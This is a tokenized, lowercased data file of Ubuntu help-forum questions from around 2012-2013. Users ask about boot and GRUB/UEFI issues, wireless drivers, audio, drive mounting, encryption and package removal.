245350	recommend way to setup a terminal program to run in the background on boot ?	i 'm running ubuntu 11.10 server edition . currently i boot up the server , log in , run the application `` screen '' , run an existing terminal program to do some work , and then use screen to lock the computer while keeping the program running . i unlock screen from time to time to check how work is progressing throughout the week . the output of the terminal program is a dashboard-like display in the terminal . the program takes up the whole terminal display . values on the terminal display are overwritten as they are updated . the terminal program in question is an existing application . modifying its source code is currently out of scope . what i 'd like to do is set up the system to do the following : on boot of the computer , the terminal program in question would run automatically in the background . i 'd like to then be able to log in from time to time and connect to the terminal program so that i could view the dashboard in the terminal interface to check how work is progressing . there seems to be a number of different ways in a linux os such as ubuntu 11.10 server edition to make something like this happen . what 's the recommended setup or recommended technologies to use to make the above happen ?
245351	weather indicator - ca n't apply location setting	after choosing location i can not apply all the settings . when pressing apply , nothing happens . does anyone have any idea why that is ?
245354	grub2 does not have entry of ubuntu 12.10 at boot menu in uefi system ?	i have uefi based computer ( i dont know the uefi in detail but i guess it is a replacement of bios ) . in the grub2 boot list there are 3 different windows entry but none ubuntu 12.10 entry . i m booting ubuntu by using grub console . i tried to use boot-repair program . when it starts it gives an warning efi detected . please check the options.. then i ignore the warning and choose the recommended repair option . however it did not work too . still no entry on boot list . i tried to use windows bootloader to deal with the problem by using easybcd program but after i add ubuntu entry , windows bootloader failed too and i can not boot windows now on . i guess my all settings amiss about efi system . do i need to do something special to grub with respect to the efi ? what is special about efi and how can i solve the problem on grub ? here all my grub information generated by bootrepair http : //paste.ubuntu.com/1552273/ after now , i am getting an error from bootrepair : an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/1552313/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . please do not forget to make your bios boot on sda4/efi/ubuntu/grubx64.efi file ! the boot files of [ the os now in use - ubuntu 12.10 ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot/efi partition ( fat32 , 100mb~250mb , start of the disk , boot flag ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot/efi partition : ] option of [ boot repair ] . my pc specs : x64 ubuntu 12.10 asus k55v notebook windows 8 installed on another partition ( currenty not bootable )
245355	how do i use the find command to effectively recurse when the pattern contains a wildcard ?	i was under the impression that the following command will search for , and list all java files starting from the current directory and recursing down . however , if i have a java file in the root of my home directory , it lists that one , and then stops . is find supposed to stop at the first match , even with a wildcard ? i guess i have a misconception about the usage . thanks for any enlightenment . find . -name *.java
245358	how can i change the volume of a specific program ?	i just installed gnome-alsa , because my mic did n't work with pulseaudio . but i ca n't seem to find a way to change the volume of a specific program , like you can in windows . i can only change the master volume . btw , i 'm running ubuntu 12.10 64bit .
245360	my luks encrypted device works on one computer but not on another - why ?	my luks encrypted device works on one computer , the one where i created it on , ubuntu 12.04 . but when i attach it to another fairly fresh 12.04 , syslog tells me `` unknown partition '' . any ideas why this is so ? do i have to migrate some master-key or such from the machine where the device works on ? my first idea was to install cryptsetup , which was missing before on machine two , but even after that - i am unable to mount . where it works : $ sudo parted -l partitiontable : msdos ... ( usual listing ) modell : generic- multi-card ( scsi ) drive /dev/sdb : 31,4gb sectorsize ( logic/physical ) : 512b/512b partitiontable : msdos 1 4194kb 31,4gb 31,4gb primary lba modell : linux-device-mapper ( crypt ) ( dm ) drive /dev/mapper/udisks-luks-uuid- ... ( some key ) : 31,4gb sectorsize ( logic/physical ) : 512b/512b partitiontable : msdos ( no numbers or data here ) $ dmsetup ls -- tree udisks-luks-uuid- ... ( same key as above ) ( 252:0 ) ââ ( 8:17 ) where it did n't work ( question answered ) : from syslog : jan 10 date name kernel : [ 69.546400 ] sd 8:0:0:2 : [ sde ] 61405184 512-byte logical blocks : ( 31.4 gb/29.2 gib ) jan 10 date name kernel : [ 69.548646 ] sd 8:0:0:2 : [ sde ] no caching mode page present jan 10 date name kernel : [ 69.548652 ] sd 8:0:0:2 : [ sde ] assuming drive cache : write through jan 10 date name kernel : [ 69.552019 ] sd 8:0:0:2 : [ sde ] no caching mode page present jan 10 date name kernel : [ 69.552024 ] sd 8:0:0:2 : [ sde ] assuming drive cache : write through jan 10 date name kernel : [ 69.556692 ] sde : unknown partition table everything else , now as it works , i could n't reproduce ...
245365	can not install aircrack-ng	today i tried to install aircrack-ng . i used the command sudo apt-get install aircrack-ng and it did n't work . here 's what it says : root @ matej-hp home/mighty2361 : / # apt-get install aircrack-ng reading package lists ... made building dependency tree reading data on the state of ... made aircrack-ng package is not available , but it refers to another package . this usually means that the package is missing , has been obsoleted , or is only available from another source . however the following packages replace iw : iw i386 e : package 'aircrack-ng ' has no installation candidate ^^i used google translate for that because it is too hard to translate for me . i 'm really sorry for that . i have a hp pavilion g7 1303 and ubuntu 12.04.1 x64 . what do i have to do to make it work ?
245366	how to fix incorrect monitor detection ?	i had various installations of ubuntu , but i find that ubuntu 10.10 and earlier supported my 17 inch samsung crt monitor ( model samtron 75e ) while the latest versions ( from 11.10 to 12.10 ) do not support it . it breaks/cuts/hides various text in resolutions from 1024x onwards as it thinks/detects my monitor to be 16 '' samsung electric company and hence works fine with a screen resolution of 800x600 . how do i tell it that it 's a 17 '' not a 16 '' monitor ? my windows xp/7/8 and ubuntu < = 10.10 all work fine and support up to a resolution of 1280x1024 on it without breaking the text .
245369	how can firefox install webapps without root privileges ?	when visiting a supported site firefox shows a pop-up message asking if you want to install a webapp ( for instance facebook , pandora , etc ) . if you accept , the corresponding package is installed ( for instance unity-webapps-facebookmessenger , unity-webapps-pandora-com , etc ) which among other things involves copying files under folder /usr/share/unity-webapps/userscripts/ ( no root password is requested during the process ) . my question is : how all this is possible since firefox is running without root privileges ? could n't this lead to security issues ? thanks
245373	`` eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported ''	i am on ubuntu 12.10 . every time that i try to open gedit on root this appears : ( gedit:3254 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported ** ( gedit:3254 ) : warning ** : could not connect to session bus
245378	keyboard not working/ kbd_drv.so missing	the keyboard stopped working on my acer aspire one running ubuntu 12.04 . the keyoard does n't work when the computer is booted ( ie : i ca n't press f12 to change the boot order ) amd it does n't work when running ubuntu 12.10 from a pendrive either . i 'm currently using a usb keyboard . the file kbd_drv.so seems to be missing but the following drivers are there . /usr/lib/xorg/modules/input/ ls evdev_drv.so mouse_drv.so synaptics_drv.so vmmouse_drv.so wacom_drv.so how can i fix it/what could the problem be ? thanks .
245380	how to change the default location of /home/.encryptfs	situation : i have a 2 large hds setup in raid 0 config and mounted in /raid ( redundancy ) i moved my /home to /raid/home . i hacked around configs to ensure that ubuntu understands that i want my /home to be /raid/home . i 've encrypted my /raid/home/myuser . the .encryptfs directory decided to create itself in /home/.encryptfs which defeats the purpose of the whole operation . i loose redundancy and i have less disk space available . questions : how can i safely move the /home/.ecryptfs to /raid/home/.encryptfs ? is it possible to configure the machine to always create .encryptfs directories in specific places instead of defaulting to /home/.ecryptfs ? thanks
245381	uninstalling programs/packages	i recently installed tools for android development ( eclipse adt ... ) and i installed incorrectly and would like to restart from the beginning . i installed a few packages out of order and i am having trouble getting the tools configured . how do i remove everything i just installed , so that i may start all over ? how do i know that all the files are removed ?
245382	xiki command not found	i have been working tirelessly to `` try '' and get xiki a shell console with gui features to work on my 12.04 system to no avail . i installed it through ruby version manager and it installed well `` i think '' . but when i try running the `` xiki '' shell command it refuses to run with an error `` xiki command not found '' . please help . any forthcoming help is appreciated : ) !
245386	what does the count on the chromium launcher icon tell ?	on my chromium launcher icon a count of 4 is displayed . i have two chromium windows with several tabs open . a count with progress bar was always displayed when downloading . therefore i checked this first but there is no download going on in any of my open tabs , and other than with downloads there is no progress bar now . here is 12.04 lts amd64 running updated chromium 23.0.1271.97 ( precise-updates ) . what would be the purpose of this count on the launcher ?
245387	exit file explorer in vim without closing	i have been trying to figure out how to exit the file explorer in vim . : q works , but it closes vim as well , not just the file browser . am i missing something or is this a bug ?
245392	how do i listen to radio hidden in flash players in audacious ?	this question has been asked before but was misunderstood . just like the asker in the other thread , my goal is not to install flash in my browser so i can hear flash-based radio in the browser . my goal is to extract the real media url so i can listen to that radio in players like audacious . to back this up with an example : http : //www.boomerradio.com/ how do i listen to these stations on audacious ? i 've tried looking in etherape and in the source of the page to find the actual streaming url , but i think they hide it deliberately .
245394	how to download specific images from a site index with wget ?	let 's suppose that i have access to a site index and in a specific directory of this index i have a lot of images , but some of those images were resized ( the originals are still there ) . the resized images have their own name , following this standard : [ image-name ] [ -resolution ] .jpg , and the original images have their name following this standard : [ image-name ] .jpg . so , i 'd like to know how to download all the original images , using wget ? note : there is no space in the image names , and i specified that the file type is .jpg , because i do n't know if there is any difference in downloading this type of file .
245403	is there a way to __disable__ compiz ' expo plugin 's expo animations ( zoom , etc ) ?	perhaps gconf-editor or dconf-editor could help do the trick ? however , rumors about ccsm 's wanton stability would prevent me from becoming too experimental about this ... who 's expo 's maintainer ? who could just `` add that line of code '' ? thanks .
245406	how to make a home server using ubuntu desktop ?	i was thinking to make my ubuntu desktop machine in file server for using it at home . i am having one old laptop . could i use it as a file server so my other 4 system can download data or view data from that old machine ( server ) . i want to make it wireless and want to access over the internet also , and have a router . but i do n't have any idea how doing it on ubuntu desktop or ubuntu server . i do n't want to install ubuntu server . want to share all of my drive . want some password or some kind of security for some folder to restrict access . *i am seeing for step by step guide how i can do it and how to access from other computer also * . i tired using filezilla but in ubuntu it is only client based application is available . it there anything like filezilla server in ubuntu . the other system is on windows as well as ubuntu . i am new to networking and server type thing any help would be appreciated .
245408	remove gnome from 12.10	in a previous version of ubuntu , i had installed gnome ( classic ) as well as gnome shell . now , after upgrading to 12.10 , i 'm satisfied with unity and would like to remove the gnome packages that are no longer needed . however , i 'm concerned that i 'll break unity ... how can i safely remove gnome classic and gnome shell from my system ?
245410	how to install/uninstall a driver on a frozen system using a livecd	i just attempted to install the latest ati video drivers on my laptop . upon rebooting the system ( including the mouse and keyboard ) freezes after the ubuntu logo . because the keyboard is frozen i am unable to switch consoles and uninstall the ati drivers . i am able to access the computer by booting with an ubuntu live cd . so i was hoping that from there i could remove the ati driver by hand but i 'm not sure exactly how to go about it . i found a glrx-uninstall.log file from previous successful attempts at uninstalling the driver ( older versions ) and i would like to think i could just follow that log and remove everything it said it did like /usr/lib/xorg/modules/linux/libfglrxdrm.so /usr/lib/i386-linux-gnu/libamdxvba.so and so on . will this work or am i likely to further screw up my system ? is there anything the uninstall script installs that i would also need to install ? alternately is it possible to run the uninstall script while using the live cd with the hd mounted ( can it be told to look in the mounted directory instead of / ) ? edit ( as per request below ) : i initially installed the drivers downloaded from ati using their installation method .
245411	vesafb / ubuntu stucks in 5 dots when starts and ctrl alt f1 says something about vesafb mising lib	please someone help me because i cant access my files anymore . ubuntu stucks in 5 dots when starts and ctrl alt f1 says something about vesafb mising lib
245414	disable sound on error messages ?	sometimes during my workflow , an error will occur . any kind of system error , browser error , etc . when this happens , a nice little message dialog appears and tells me exactly what has happened or what went wrong . however - it is also accompanied by a loud , obnoxious and sudden noise . maybe to normal users , this is tolerable . errors happen . but when you 've been coding for 18 hours straight to pure silence / soft music and this monstrosity occurs - well you could end up flinching and falling backwards out of your chair ( which may or may not have happened just 10 minutes ago . ) can i mute , or otherwise change this sound ?
245417	how to add kernel boot parameters	i 'm looking for a way to fix this bug the way described here . but i do n't know how to edit boot options in kubuntu . in my distribution there 's no /boot/grub/menu.lst file and also the grub.cfg in same folder does not have a line starting with kernel . i 'm really clueless about adding these options !
245425	what does `` $ $ '' mean in the shell ?	what does the output of the command below mean ? ( result is positive integer ) echo $ $
245428	how to know the pid of active window	how to know the pid of active ( focused ) window ? i want to write a script in which it is necessary to know whether the user is actively using a program [ browsing internet with somthing say firefox ] or doing something else [ writing text with something say gedit ] in my case i want to download big files but do n't want to hurt browsering speed . so when i browse the active window is of firefox and i want to stop downloading . when i read pdf active window is of pdf reader and i want to resume download . that 's it .
245430	ubuntu wont install or run from live cd or flash drive	what would happen if trying to install or run ubuntu on a platform that is not supported ? i can not get ubuntu to install or even run from a live dic or flash drive . ive installed ubuntu onto an ssd in efi mode and moved over to the system in question but it will not even see it , same as the live cd . i click on the medium in the bios to boot from and nothing happens . secure boot is disabled . is this because the cpu is not supported ? is this because ubuntu was installed on another system and no firmware has been loaded for the unsupported platform ? is there a way to modify the kernel with the information needed to boot ubuntu ? i do not need ubuntu to be fully functional i just need it to boot . this is an intel preproduction tablet .
245431	newly installed ubuntu feels slow	about two years ago i first tried ubuntu ( 11.04 ) on my sony vaio fw11e and i remember that i was impressed by how smoothly everything just worked out of the box . for different reasons i reverted back to windows 7 however . today i tried installning ubuntu 12.04 32-bit on the same computer and now everything seems a bit `` off '' ( slow resonse time on mouse clicks etc ) . first of all the cpu-fan is at maximum load , blowing out burning hot air all the time . secondly the suggested proprietary graphics drivers from ati wont install correctly , and i get a strong feeling that the hardware overall is not recognized correctly in the os . is there any reason that the older ubuntu 11.04 would be working better with my laptop ( especially the ati drivers ) or could there be another reason for the un-smoothness that i am experiencing . should i try installning older versions of ubuntu ? is there a way to see if the motherboard chipset drivers are correct ? computer specs : intel pm45 intel core 2 duo 2,2 ghz 3 gb ram ati mobility radeon hd 3470
245437	ca n't connect to a wireless wpa2 network with group cipher ccmp from a t40 laptop with ipw2100	i have got the following problem . i am trying to connect my ubuntu machine to a wireless network ( wpa2 personal ) . i am sure that i am providing the correct key , however i am not able to connect to the network . on the other hand there is completely no problem connecting to this network from a windows machine nor from a mobile device ( android ) . also there is no problem connecting to a wpa2 network provided by a router set up on a smart phone , so this does not look like a hardware issue of an old machine . has anybody stumbled upon a similar problem ? update : after a very interesting discussion with gertvdijk it turned out that this is highly probable that the problem here is that the network i am connecting to . it uses ccmp and not tkip . i am not able to change this , so i am looking for another solution . the wireless card seems to have cipher-ccmp on its list . edit : the output of lspci -nn | grep 0280 is : 02:02.0 network controller [ 0280 ] : intel corporation pro/wireless lan 2100 3b mini pci adapter [ 8086:1034 ] ( rev 04 ) edit : the results of sudo iwlist eth1 auth are as follows authentication capabilities : wpa wpa2 cipher-tkip cipher-ccmp current wpa version : unknown current key management unknown current pairwise cipher wep-104 unknown current tkip countermeasures : yes current drop unencrypted : yes current authentication algorithm : current receive unencrypted eapol : no current roaming control : yes current privacy invoked : yes edit : the results of executing cat /var/log/syslog | grep etwork | tail -n20 are posted here edit : after executing dmesg there is a message that `` worries '' me . [ 260.506187 ] ipw2100 : ca n't get tkip countermeasures : crypt not set ! edit : the outcome of sudo iwlist eth1 scan is here . the network i am trying to connect to is named thewirelessiamtryingtoconnectto . all the other network names have been changed by me .
245438	mounting of external harddrive	im using ubuntu v12.04.its working fine but im not able to mount my external harddrive.it says there is an error in mounting the hdd because of unknown file system exfat . hope to find a few solutions .
245442	ubuntu starts in tty1 only - no screens detected - cant ' startx	i just rebooted my laptop and i ca n't start the gui . i logged in in text mode and startx says no screens detected . i have tried to purge and install the nvidia driver , i have tried to reinstall and reconfigure xserver-xorg ... i have tried to manually add my device ( video card ) , monitor and screen in /etc/x11/xorg.conf and ... . i have no gui at all . i need my desktop environment back . can anyone help ?
245443	ubuntu 12.10 headphone faint beep on audio start and stop	i was wondering if anyone had experienced this before and if there was a fix for it . whenever i play a video or any music , my headphones produce a faint beep whenever the audio starts or stops , the beep sometimes happens after loading a webpage as well . i do n't think its my headphones , because this did n't happen when i had windows installed before making the switch to ubuntu . it 's almost as if the sound card turns off and then turns on again when i want to play audio . maybe there is a way to keep it on always ? i am running ubuntu 12.10
245446	stereomix and flash	i have a problem with using stereomix and flash . i 'm not able to access to flash settings , like i done on windows . i installed an pavucontrol , and i have stereomix on audacity , but not on the flashplayer . how to stream in the real time from microphone and internal sound ?
245452	how can i install canon pixma mg 3150 ?	i 'm using ubuntu 10.04 on a toshiba satellite and have today purchased a canon pixma mg 3150 printer . ubuntu ca n't find the drivers online and the cd i have is `` obviously '' for ... you guessed it windows . i 've taken the printer out of the box , plugged it all in as recommended , the laptop sees the new device but the device is not listed , i tried to open a similar printer from the list ( canon pixma 3100 series ) it tells me it is printing the test page but nothing happens on the printers end . do i need to do anything else ? can someone give me some pointers were as to find the solution please ?
245455	how to remap alt-tab app-switching for ubuntu-guest/osx-host virtualbox ?	i just setup an ubuntu 12.04.1 lts virtualbox ( guest ) in an osx lion host . it 's mostly fine , but one annoyance is that , to switch between apps in the ubuntu guest 's interface , i need to press ⌥-tab ( aka option key-tab ) , whereas my brain/finger wiring calls for pressing ⌘-tab ( aka command key-tab ) . to be more specific , it calls for pressing left-⌘-tab . ( left-⌘ = the ⌘ key to the left of the space bar . ) is there a way to re-map the ubuntu guest 's app-switching action to left-⌘-tab ? ( fwiw , currently i have the virtualbox 's host key mapped to right-⌘ , but i 'd be happy to change this setting if it conflicts with the solution to the problem above . )
245457	per-application volume control	is there a way to get per-application volume control similar to windows 7 ? i am looking for a way to do this in both lubuntu and kubuntu .
245470	wacom bamboo pen & touch cth-470 3+ finger gestures	i love my cth-470 and i 'm glad it 's without having to spend hours in the terminal to get it working since i believe 12.10 ( which i 'm running now ) . but in the manual it states that you can swipe with three or even four fingers . however , i ca n't seem to find how to 'activate ' this in ubuntu . is this even possible ? if yes , how ? and if no , are there any plans to support this in the future ?
245471	ubuntu 12.04.1 becomes unresponsive and frozen	i have a `` classic '' install of ubuntu 12.04.1 lts 64 bits , with the ubuntu-restricted extras 57 installed . all updates done . when loading this page from a daily news papers from firefox 18 : http : //www.leparisien.fr/societe/video-la-lecon-de-conduite-sur-neige-de-bernard-darniche-20-01-2013-2496573.php the whole system becomes unresponsive and like frozen . i ca n't break it nor gain control again through the : ctrl alt del . i have to turn it off the hard way ( electric reset ! ) . i suspect a bad javascript on the page . is there a better way to gain control back ? is there a better combination of keys to kill the unresponsive application ? is this a firefox or an ubuntu bug to report ? thanks in advance for your help .
245474	what 's the purpose of edit > copy in rhythmbox ?	i was trying to find a way to copy a song to folder while listen to it but edit > copy does n't looks to work ( it does n't paste neither a file nor a text information ) i 'm using rhythmbox 2.97 , ubuntu 12.10
245475	apps not using their installed icons depending on directory	on precise , apps use their icons in menus if the `` app.desktop '' file is in /usr/share/applications and the icon is in /usr/share/icons . if the app.desktop file is in /usr/share/kde4/apps/ and the icon is in /usr/share/app-install/icons/ , then no icon displays . if the icon is moved to /usr/share/icons/ or if i put a path to the icon or just add a suffix -.png , then it displays . instead of making these edits to each .desktop file or moving icon.png 's around , is there a configuration file i can edit to make the system look for icons in their default directories ? so if an app install itself and puts its own app.desktop file and its own icon in an unusual place , its icon will still show up in the launcher and other menus ? or is it that some deb packages from sofware center are just configured for older ubuntu releases , where these other install locations were searched by the system ?
245477	half installed package error	received the following error when attempting to install from terminal : selecting previously unselected package dassault-systemes-draftsight . ( reading database … 211618 files and directories currently installed . ) unpacking dassault-systemes-draftsight ( from …/downloads/draftsight.deb ) … access control disabled , clients can connect from any host access control disabled , clients can connect from any host access control disabled , clients can connect from any host now receiving system error notification that it 's half installed and causing the error . it 's crashing the software center , i can not figure out how to kill the offending dpkg or how to un-install what is installed to start over . sudo apt-get remove dassult-systemes-draftsight [ sudo ] password for user : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? made a bit more progress : reading package lists ... done building dependency tree reading state information ... done e : the package dassault-systemes-draftsight needs to be reinstalled , but i ca n't find an archive for it . dpkg/status shows half installed : package : dassault-systemes-draftsight status : install reinstreq half-installed priority : extra section : applications architecture : i386 version : 2012.7.347 but terminal says it 's not there : user : ~ $ sudo dpkg -- force-remove-reinstreq -- remove dassult-systemes-draftsight dpkg : warning : ignoring request to remove dassult-systemes-draftsight which is n't installed user @ computer : ~ $ sudo dpkg -e draftsight dpkg-deb : error : failed to read archive `draftsight ' : no such file or directory
245480	streaming my own music	i 'm a music producer who constantly renders new music to take on the road and listen . currently i use itunes cloud , which allows me to upload my music and stream from all ios devices . is this somehow possible with ubuntu one streaming ? i did notice that it shows up in the files app , but that requires downloading to play .
245482	ubuntu 12.10 wont boot with the windows installer	i just installed 12.10 on my pc alongside windows 8 . i followed all the direction with the windows installer but when i try to boot ubuntu it says that it cant run it because a file is missing .
245483	why can i not save files with firefox ?	am using firefox 18 ( also tried 19b2 from launchpad repository ) . when trying to save a file or website to a specific directory , i get error message ... could not be saved , because you can not change the contents of that folder . change the folder properties and try again , or try saving in a different location . in firefox error console i can see error : ns_error_failure : component returned failure code : 0x80004005 ( ns_error_failure ) [ nsiwebbrowserpersist.savedocument ] the directory that am trying to save to is a nfs volume . it is in my own username and it has 750 permission . files inside have permission 660 . these below can save , edit and delete files from the directory : chrome 25.0.1364.36 beta kde dolphin 2.1 firefox 17 , 18 , 18.1 , 19b1 , 19b2 ( downloaded from https : //ftp.mozilla.org/pub/mozilla.org/firefox/releases/ ) so the problem is only in the release from ubuntu/debian/repository , not from mozillas own release of firefox . i have a clean firefox profile ( deleted ~/.mozilla directory ) . please advice .
245485	how can i resize the volume osd in gnome3 ( shell ) ?	how can i resize the volume osd display to a more `` sane '' size ? currently it takes about 1/4th of my screen height . i may be shortsighted , but not that shortsighted . i checked my theme settings , but could n't find any hint for setting the size of this window . where do i have to look ? is it even a theme issue or is it gnome globally ?
245489	mouse problem on ubuntu 12.10 64bit	my mouse works fine till i open a window like firefox or a folder my mouse left and right click stop working , i ca n't maximize or minimize and i ca n't move my windows at all and in firefox i ca n't open new tabs etc . i have found a temporary solution if i click the little cogwheel/power-button in the top right corner and than click it away , now i can use my mouse to maximize my window but as soon i open a new window the problem comes back again i 'm a big noob i just installed ubuntu and this is my first time using it and i have no skills in scripting or programming , i need a lot of help .
245491	how to change the y-axis values on a chart in libreoffice calc ?	i 'm working with percentages and i need to be able to compare my four charts , but i ca n't get the y-axis maximums to all be 100 , as all of the data values for each individual charts are different.. is there a way to change the y-axis values ?
245492	issue with wireless connection on 12.10	i have a samsung n150 , a windows 7 machine and recently installed - for the first time - ubuntu . the install was successful apart for an issue with wireless connection . when i check the connection status my netbook states i am connected to my wireless router but as i try to open firefox i get the message `` server not found '' . 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8192e/rtl8192se wireless lan controller [ 10ec:8192 ] ( rev 01 ) 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] i tried connecting the laptop to a wired connection and it worked fine . i also know my laptop has no issue with wireless connection as i could connect to the internet fine through windows . i am also able to access the internet on other devices . i am just unable to access the internet wirelessly even though it comes up on the laptop as connected . if anyone has come across this problem or knows how to solve it please help as it is driving me crazy .
245495	does live cd require a hard drive to be installed ?	i have an old laptop which does n't have a hdd and i ca n't get live cd to boot on it . ( trying to boot using 'try ubuntu ' option ) . it gets so far and then just shows a flashing cursor in the top left hand corner . it stays like this indefinitely . if however , i put the hard drive from my other laptop into this one , it boots from the cd fine . even more oddly , once it 's booted into ubuntu i can remove the hard drive ( probably not advisable while the machine is still running ! ! ) and it continues to work fine . i have noticed that the hard drive is access briefly during boot up and it is at this point where it would fail if the hard drive was n't present . just curious , someone asked the exact same question on here before and the general consensus was that it should work without a hdd , although , in truth , the people who answered could only confirm that it works with a completely dead hard drive in the pc and not in the complete absence of one . can anyone confirm ? thanks !
245500	unable to mount o2 hilink huawei e3131 ubunutu 12.10	when trying to connect to the internet with an hilink huawei e3131 i get unable to mount o2 hilink error mounting /dev/sr0 at /media/gman/o2 hilink : command-line `mount -t `` iso9660 '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 '' `` /dev/sr0 '' `` /media/gman/o2 hilink '' ' exited with non-zero exit status 32 : mount : block device /dev/sr0 is write-protected , mounting read-only mount : /dev/sr0 : ca n't read superblock i can get it to work in a round about way but i have to delete the wired connection ( it shows up as disable networking ) , then restart my computer and enable networking and plug in device . this must be done every time i want to connect to the internet . by the way i am new to linux .
245507	task management software	i 'm looking for task management software . ideally , it 'd allow for nested subtasks , have a percent complete ( with parent items showing their percent based on the percents of their children ) , have a bargraph beside all tasks ( subtask or not ) ... ... and not be date-based ! several programs ( e.g . ganttproject , gnome planner , redmine , etc . ) have seemed reasonable , but seem to base just about everything they do on start and end dates , which i wo n't have . this will be for organizing personal projects , which will never be `` due '' , just something to play with in spare time ( which i have very little of ) . ( similarly , i like freemind , but it does n't appear to do percent complete . ) any ideas ?
245512	speech-dispatcher disabled , saned disabled and low graphics error and login-faliure	i am new to ubuntu and do n't know the error i am having while i boot my system . following is what appears speech-dispatcher disabled : edit/etc/default/speech-dispatcher saned disabled : edit/etc/default/saned * checking battery state ok after this nothing happens.checking battery state does n't comes to an end and i have to try to reboot the system again and again until tty1 window appears which is then followed by low graphics mode error.i am using the intel graphic card and the dedicated amd radeon 7700 is disabled . i do n't want to use the amd one but want to have a smooth operation with the intel one.i have checked the other solutions linked to the same problem but i am not sure of them.i have tried re installing the x.org drivers for intel but still have the error of low graphics . i am not sure the two problems i quoting are related to each other or not.it will be appreciable if anyone can correct if i am not presenting the problem in its right sense . today i am facing a new problem . i ca n't login into my original user account.whenever i fill in the password the screen blinks and prompts for the password again . so i have to login as a different user.but the original problem of saned disabled still exists.when i boot the system i get the message of saned disabled as shown above.then when i try ctrl+alt+f1and use startx i get the following error . fatal server error . no screens found . ( ee ) . please consult the the x.org foundation support for help . ( ee ) please also check the log file at `` /var/log/xorg.1.log '' for additional information . xnit : giving up . xnit : unable to connect to x server : connection refused . xnit : server error . xnit : timeout in locking authority file /home/user name/.xauthority` . then i have no options but to try rebooting the system again and again until i get to login in graphical mode where i ca n't login as the original user .
245518	ubuntu 12.04 lts : reverseddc is not working correctly	when i enter : man radeon i get the output : option `` reverseddc '' `` boolean '' when bios connector informations are n't available , use this option to reverse the mapping of the 2 main ddc ports . use this if the x server obviously detects the wrong display for each connector . this is typically needed on the radeon 9600 cards bundled with apple g5s . the default is off . every time i boot i am met with a low resolution login screen , which is fine , but when i enter my password to boot into the desktop environment i 'm met with a no signal message on the screen and i have to physically switch the connector port . does anyone know what to do , or how to fix this ?
245525	android phone/tablet connects to ubuntu through wireless router without ethernet connection	forget the description beneath . let me ask it in an other way . i have a ubuntu pc , a wireless router and an android tablet in the jungle . no internet what so ever , just a wireless signal from my router . how can i set this up that i have a permanent link ( share ) between the pc and tablet . the pc shares to the tablet and the tablet to the pc . should i wire the pc to the router on the wan port or the lan port ? ( as mentioned on the net for extending ethernet through an ap on an existing wireless network ) is this just a samba/ssh mather ? i tried a lot but just could n't make it work . pinging works most of the time but every other attemps gives me `` host unreacheble '' . thanks ced what follows was the first formulation of the question : i would like to connect an android phone/tablet to my ubuntu pc in my car . having a spare router i though of making a local wireless network . all the info on the net is about turning the spare router into an access point of a existing ethernet connection . in my case the spare router is not connected to the ethernet wire but directly onto a network port on my pc . in my car i have mobile ethernet , i have been able to share this connection through the router to broadcast internet to my android phone . i also have a wireless network card ( no master mode possible ) to connect my ubuntu pc to wireless networks at work and at home ( car is not moving ) . is there a set-up where you can communicate with a router directly attached to the network card on a linux pc ? what it could be used for : sharing music library for xbmc yatse controller in car . this works as a charm at home but not once you 're out of range of the wireless network . any help would be very appreciated thanks in advance . cedric .
245526	12.10 login screen skipped , just begins session	so ive got windows 8 and ubuntu 12.10 dual booted with windows 8 bootloader and grub timeout set to 0 . when it boots i dont even see the orange logo with the orange dots ( loading screen ) just a blank scrren think a flicker of a purple one , but then i see my fully logged in unity session , i have a password set , i did set it to prompt for login during the instalation and if i go into my user accounts the automatic login is off ? ? ive seen this : http : //askubuntu.com/questions/100010/no-password-asked-at-login-screen-just-start-session-button-with-lightdm/245432 # 245432 but i have no clue how to get gnome system tools , if someone has the ppa please share : ) hoping for it to show me the login screen every time i boot , and ask for password , note i can access the login screen by locking the pc .
245527	wireless issues on toshiba c855d satellite	i just bought a toshiba c855d satellite yesterday and installed 12.04 this morning without a problem . on the first boot up , i had no issues with wireless at all until i installed updates and restarted my computer . at this point , even after disabling and reenabling networking , i am not being shown any wireless connections that are definitely in range . any help is greatly appreciated . a quick update , i just plugged in an ethernet cable and am getting a different problem with that . the symbol on the top seems to be indicating that it is searching for a connection as a notification pops up telling me that the wireless network is now disconnected . it is doing this pretty much endlessly . results of : lspci -nnk etc . realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8211 ] kernel modules : rtl8192ce 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) ifconfig -a eth0 link encap : ethernet hwaddr 00:8c : fa:33:7f : ac up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:56 errors:0 dropped:0 overruns:0 frame:0 tx packets:56 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3344 ( 3.3 kb ) tx bytes:3344 ( 3.3 kb )
245534	file , edit buttons have dissapeared from ubuntu desktop	it used to be that i could go up to the top of my desktop and there would be a file , edit etc . now when i move my cursor over the words `` ubuntu desktop '' nothing happens . also the `` add a launcher '' entry when i right click my desktop is gone . any ideas ? sorry if this question is poorly worded . even when i have the mouse over it it still shows this :
